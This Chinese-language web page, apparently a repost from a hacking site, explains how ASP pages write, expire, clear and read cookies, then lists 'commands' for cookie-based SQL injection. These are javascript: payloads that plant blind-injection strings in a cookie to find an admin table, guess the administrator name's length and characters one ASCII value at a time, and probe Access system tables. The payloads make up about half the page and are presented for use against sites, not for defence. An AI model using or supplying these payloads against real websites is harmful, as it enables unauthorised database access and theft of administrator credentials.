分類  >  Web前端 >

Cookies流入詳解與指令

tags:    時間:2013-12-10 21:58:32
Cookies注入詳解與指令
Cookies注入詳解與指令 2009-10-29 10:19:54  www.hackbase.com  來源:互聯網
  1.如何寫入Cookies?  Response.Cookies("欄位名")=變數或字元串,例如:  Response.Cookies("name2")="Dingdang"    2.如何設置Cookies時間?  Response.Cookies("欄位名").expires=時間 ...
  1.如何寫入Cookies?
  Response.Cookies("欄位名")=變數或字元串,例如:
  Response.Cookies("name2")="Dingdang"
  
  2.如何設置Cookies時間?
  Response.Cookies("欄位名").expires=時間函數+N,例如:
  Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
  Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小時。
  
  3.在以往的ASP教程中,很少有介紹Cookies退出的方法。在「退出」這個ASP頁中可以這樣寫:
  Response.Cookies("欄位名")=""
  之後,在客戶端的瀏覽器就清除了Cookies,並且Cookies文件會消失。注意有多少個欄位,就要寫多少句來清除。
  
  4.如何讀取Cookies?
  變數名=Request.Cookies("欄位名"),例如:
  name2=Request.Cookies("name2")
  如果網頁中寫入<%=name2%>這句,則會顯示「Dingdang」。
  也可以這樣直接讀取Cookies,<%=Request.Cookies("name2")%>
  
  Cookies是屬於Session對象的一種。但有不同,Cookies不會佔伺服器資源;而「Session」則會佔用伺服器資源。所以,盡量不要使用Session,而使用Cookies。
  
  指令:
  
  javascript:alert(document.cookie="id="+escape("156 and 1=1"));
  javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
  //猜是否有admin表
  javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
  //猜是否有username表
  javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
  //看管理員密碼是否是5位
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
  //第一位是否是ASC碼97,相當於a
  javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
  //第二位
  javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
  //看系統表

推薦閱讀文章

Bookmark the permalink ,來源:互聯網